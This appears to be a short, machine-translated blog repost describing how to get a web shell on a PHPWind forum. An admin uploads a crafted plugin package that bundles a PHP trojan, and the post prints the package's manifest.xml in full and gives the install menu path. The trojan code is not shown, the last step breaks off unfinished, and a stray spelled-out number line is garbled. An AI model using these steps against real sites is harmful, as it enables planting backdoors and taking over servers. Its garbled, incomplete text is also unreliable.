Phpwind background getshell method

At the background upload plug-in of php wind, you can upload a phpwind plug-in installation package in standard format including the php trojan, and get the shell

1、 First, make an installation package, which needs to include a manifest.xml file and a php sentence (here the file name is php. php).

The manifest.xml code is as follows:

 <? xml version="1.0" encoding="gbk"?> <manifest> <application> <name>getshell</name> <alias>getshell</alias> <version>1.0</version> <pw-version>1.0</pw-version> <type>app</type> <description>getshell </description> <charset>gbk</charset> <website> </website> <author-name> 123@wooyun </author-name> <author-email> </author-email> <author-icon> </author-icon> </application> <res>res</res> </manifest>

Package the above files into zip format.


2、 In the background, click Cloud Platform → Application Management → Local Installation to upload the prepared installation package and click Install.

 nine million four hundred and seventy-seven thousand seven hundred and fourteen

 3、 The shell is

Original article reprint please specify: reprint from Seven Travelers Blog

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Phpwind background getshell method: waiting for you to sit on the sofa!


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